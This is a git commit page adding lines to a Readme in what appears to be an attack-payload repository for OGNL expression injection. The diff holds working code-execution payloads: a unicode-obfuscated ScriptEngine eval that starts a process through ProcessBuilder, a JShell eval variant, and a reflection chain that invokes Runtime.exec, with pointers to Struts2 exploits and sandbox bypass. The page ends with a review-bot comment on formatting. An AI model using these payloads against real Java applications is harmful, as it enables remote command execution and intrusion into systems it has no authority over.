1 parent 56c34fd commit f28035c
1 file changed
shell/OGNL/Readme.md
@@ -3,7 +3,11 @@
3
new javax.script.ScriptEngineManager().getEngineByName("js").eval(此处的Payload可以进行unicode编码)
4
5
new javax.script.ScriptEngineManager().getEngineByName("js").eval("new j\u0061va.lang.ProcessBuilder['(java.l\u0061ng.String[])'](['cmd.exe','/c','calc']).start()\u003B");
6
+可参考s2的exp
7
+jdk9+
8
+@jdk.jshell.Jshell@create().eval('code');
9
10
+${(#cls = #this.getClass().forName("java.lang.Runtime")).(#rt=#cls.getDeclaredMethod("getRuntime",null).invoke(null,null)).(#exec=#cls.getDeclaredMethod("exec", this.getClass().forName("[Ljava.lang.String;"))).(#exec.invoke(#rt,"calc".split(",")))}
11
```
12
## bypass sm
13
参考 js的bypass
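Review bot: The added lines at new lines 6 to 10 sit above the closing fence at line 11, so the notes "可参考s2的exp" and "jdk9+" will render as part of the code block rather than as prose labels. Move those two notes outside the fence (or turn them into sub-headings like the existing "## bypass sm") and keep only the expressions inside it. "可参考s2的exp" also gives no link or advisory name, so a reader cannot tell which reference is meant; add one. The last added expression has no label at all. A one-line description of the runtime and OGNL version it was checked against would help anyone using this Readme to build detections or regression tests for expression-injection filters.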
0 commit comments